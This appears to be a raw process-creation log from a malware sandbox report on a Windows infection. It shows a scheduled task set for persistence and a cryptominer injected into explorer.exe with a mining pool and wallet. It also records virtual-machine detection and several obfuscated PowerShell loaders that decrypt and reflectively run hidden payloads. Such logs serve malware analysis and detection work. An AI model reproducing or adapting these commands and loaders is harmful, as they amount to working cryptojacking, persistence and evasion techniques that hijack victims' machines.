        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
        Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b07a7a50-b27b-4e63-a696-921ea5101b06}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2754d8d4-2c6c-4f8b-b189-8df08fdb6662}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{c189289e-8452-4651-b13f-f89ff87f8bfd}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{2b935158-6528-4027-b9d5-aa7c0cf2c1f6}
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe c:\windows\explorer.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-stealth
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\users\user\appdata\local\temp\b.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($crctf){ $kmegb=[system.security.cryptography.aes]::create(); $kmegb.mode=[system.security.cryptography.ciphermode]::cbc; $kmegb.padding=[system.security.cryptography.paddingmode]::pkcs7; $kmegb.key=[system.convert]::frombase64string('yxhq0zci7ki7oymtrrbybju3j/i3hbqgk5zcg1ae0uo='); $kmegb.iv=[system.convert]::frombase64string('wdcpqinwnn818it8srh8xg=='); $tgpad=$kmegb.createdecryptor(); $dqivj=$tgpad.transformfinalblock($crctf, 0, $crctf.length); $tgpad.dispose(); $kmegb.dispose(); $dqivj;}function vixdo($crctf){ invoke-expression '$vbzuz=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$crctf);'.replace('blck', ''); invoke-expression '$sdanw=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$ihcxj=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vbzuz, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $ihcxj.copyto($sdanw); $ihcxj.dispose(); $vbzuz.dispose(); $sdanw.dispose(); $sdanw.toarray();}function gyumc($crctf,$tscxf){ invoke-expression '$jaygu=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$crctf);'.replace('blck', ''); invoke-expression '$aztcr=$jaygu.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$aztcr.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxf)blck;'.replace('blck', '');}$dutvy = 
'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $dutvy;$fqcuc=[system.io.file]::readalltext($dutvy).split([environment]::newline);foreach ($bcngu in $fqcuc) { if ($bcngu.startswith(':: ')) { $sdcln=$bcngu.substring(3); break; }}$fkndv=[string[]]$sdcln.split('\');invoke-expression '$pcpof=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[0])));'.replace('blck', '');invoke-expression '$taqwk=vixdo (elgju (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($fkndv[1])));'.replace('blck', '');gyumc $pcpof (,[string[]] (''));gyumc $taqwk (,[string[]] (''));
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:fululhvbhhgj{param([outputtype([type])][parameter(position=0)][type[]]$nnulhbqztprdhv,[parameter(position=1)][type]$ofcpxnfkpy)$qvwxxlmoanu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+''+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+'me'+[char](109)+'o'+[char](114)+''+[char](121)+''+[char](77)+'odul'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+''+[char](68)+''+'e'+''+[char](108)+'e'+[char](103)+'a'+[char](116)+''+'e'+'t'+[char](121)+''+[char](112)+''+'e'+'','c'+[char](108)+''+'a'+'ss'+[char](44)+''+'p'+''+[char](117)+'b'+[char](108)+''+[char](105)+''+[char](99)+''+[char](44)+''+'s'+''+[char](101)+''+[char](97)+''+'l'+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+'s'+[char](105)+''+[char](67)+'l'+'a'+'s'+[char](115)+','+[char](65)+''+[char](117)+''+[char](116)+'oc'+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qvwxxlmoanu.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+[char](101)+''+'c'+''+'i'+''+[char](97)+''+[char](108)+'n'+[char](97)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+'by'+[char](83)+''+'i'+''+[char](103)+''+[char](44)+'pu'+'b'+''+'l'+'i'+'c'+'',[reflection.callingconventions]::standard,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+[char](117)+''+[char](110)+'t'+'i'+''+[char](109)+''+[char](101)+',ma'+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$qvwxxlmoanu.definemethod(''+'i'+''+'n'+''+[char](118)+''+[char](111)+''+[char](107)+''+[char](101)+'','p'+'u'+''+[char](98)+'l'+[char](105)+'c'+','+''+[
char](72)+''+[char](105)+'de'+'b'+''+'y'+''+'s'+'i'+[char](103)+','+[char](78)+''+'e'+''+'w'+''+'s'+''+[char](108)+'ot'+[char](44)+''+'v'+''+'i'+''+'r'+'t'+[char](117)+''+'a'+'l',$ofcpxnfkpy,$nnulhbqztprdhv).setimplementationflags(''+'r'+''+'u'+''+[char](110)+''+'t'+''+[char](105)+'m'+[char](101)+''+','+'m'+'a'+'n'+[char](97)+'g'+[char](101)+''+'d'+'');write-output $qvwxxlmoanu.createtype();}$iknksxdttnkac=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+''+'t'+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+'ic'+[char](114)+''+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+''+'t'+''+[char](46)+''+[char](87)+''+[char](105)+''+[char](110)+''+'3'+''+[char](50)+''+'.'+'u'+'n'+''+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+''+'n'+''+[char](97)+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+[char](101)+''+[char](116)+''+'h'+''+[char](111)+''+[char](10
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:kvehnqwssgcg{param([outputtype([type])][parameter(position=0)][type[]]$mhkvivexzpriho,[parameter(position=1)][type]$qoutaubbtf)$msesbhasmah=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+'e'+'f'+[char](108)+''+'e'+''+'c'+'te'+'d'+'d'+[char](101)+'le'+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+''+[char](101)+''+'m'+''+[char](111)+'ry'+[char](77)+''+[char](111)+'dul'+'e'+'',$false).definetype(''+[char](77)+'y'+[char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[char](97)+''+'t'+''+'e'+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+'c'+''+'l'+''+[char](97)+''+'s'+'s'+','+''+[char](80)+''+[char](117)+''+[char](98)+'l'+[char](105)+'c'+[char](44)+''+[char](83)+''+[char](101)+'a'+[char](108)+'e'+[char](100)+''+[char](44)+''+[char](65)+''+[char](110)+''+[char](115)+''+[char](105)+'c'+[char](108)+''+[char](97)+''+[char](115)+'s,'+[char](65)+'u'+[char](116)+'o'+'c'+'la'+[char](115)+''+[char](115)+'',[multicastdelegate]);$msesbhasmah.defineconstructor(''+[char](82)+''+[char](84)+''+'s'+''+[char](112)+''+'e'+'c'+'i'+''+[char](97)+''+[char](108)+''+[char](78)+'ame'+[char](44)+''+[char](72)+''+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+[char](99)+'',[reflection.callingconventions]::standard,$mhkvivexzpriho).setimplementationflags(''+'r'+''+[char](117)+''+'n'+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+'e'+[char](100)+'');$msesbhasmah.definemethod(''+[char](73)+'nv'+'o'+'k'+'e'+'',''+[char](80)+''+'u'+''+'b'+''+[char](108)+''+[char](105)+''+[char](99)+''+','+''+[char](72)+'i'+'d'+'eb'+'y'+'
s'+'i'+'g'+','+''+[char](78)+''+'e'+'w'+[char](83)+''+'l'+''+[char](111)+''+'t'+''+','+''+'v'+''+'i'+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qoutaubbtf,$mhkvivexzpriho).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+'t'+[char](105)+'m'+[char](101)+''+','+''+[char](77)+'ana'+[char](103)+''+[char](101)+'d');write-output $msesbhasmah.createtype();}$gffwslpcsixef=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+'s'+[char](116)+'e'+[char](109)+''+'.'+''+'d'+''+[char](108)+''+'l'+'')}).gettype(''+[char](77)+''+'i'+''+'c'+''+[char](114)+'o'+[char](115)+'o'+[char](102)+''+[char](116)+''+'.'+''+'w'+'i'+'n'+'32.'+[char](85)+'n'+[char](115)+''+[char](97)+''+'f'+''+[char](101)+'na'+[char](116)+'i'+[char](118)+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+''+[char](111)+''+[char](100)+'s');$xrdavnignzllon=$gffwslpcsixef.getmethod(''+'g'+''+'e'+''+[char](116)+''+[char](80)+''+'r'+'o'+[char](99)+''+'a'+''+[cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:yrwhxohynmxl{param([outputtype([type])][parameter(position=0)][type[]]$mjbpafoyxdmllp,[parameter(position=1)][type]$mbxclwmzji)$qsxeicuzieu=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+[char](116)+'e'+[char](100)+''+[char](68)+'e'+[char](108)+'eg'+'a'+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+'m'+'e'+'m'+'o'+[char](114)+''+'y'+''+[char](77)+'o'+'d'+''+[char](117)+''+'l'+''+[char](101)+'',$false).definetype(''+[char](77)+''+'y'+'d'+'e'+''+'l'+'e'+[char](103)+'a'+[char](116)+'e'+[char](84)+''+'y'+''+'p'+'e',''+[char](67)+''+'l'+'a'+'s'+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+'ic'+[char](44)+''+[char](83)+''+[char](101)+''+[char](97)+'le'+'d'+','+[char](65)+''+'n'+'sic'+'l'+'a'+'s'+''+[char](115)+''+[char](44)+''+'a'+'ut'+[char](111)+''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$qsxeicuzieu.defineconstructor(''+[char](82)+''+[char](84)+'sp'+[char](101)+''+[char](99)+''+'i'+'a'+[char](108)+''+[char](78)+''+[char](97)+''+[char](109)+'e,h'+'i'+''+'d'+'e'+'b'+''+'y'+'s'+[char](105)+''+'g'+''+[char](44)+''+[char](80)+'ub'+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mjbpafoyxdmllp).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+'i'+''+'m'+''+'e'+''+[char](44)+''+'m'+'a'+[char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsxeicuzieu.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+''+'e'+'','p'+[char](117)+''+[char](98)+''+[char](108)+'i'+'c'+''+','+''+'h'+'i'+'d'+''+'e'+'b'+[char](121)+''+[char](83)+'i'+'g'+''+','+''+'n'+''+[char](101)+''+'w'+'s'+[char](108)+''+[char](111)+''+[char](116)+','+'v'+''+[char](105)+''+'r'+'t'+[c
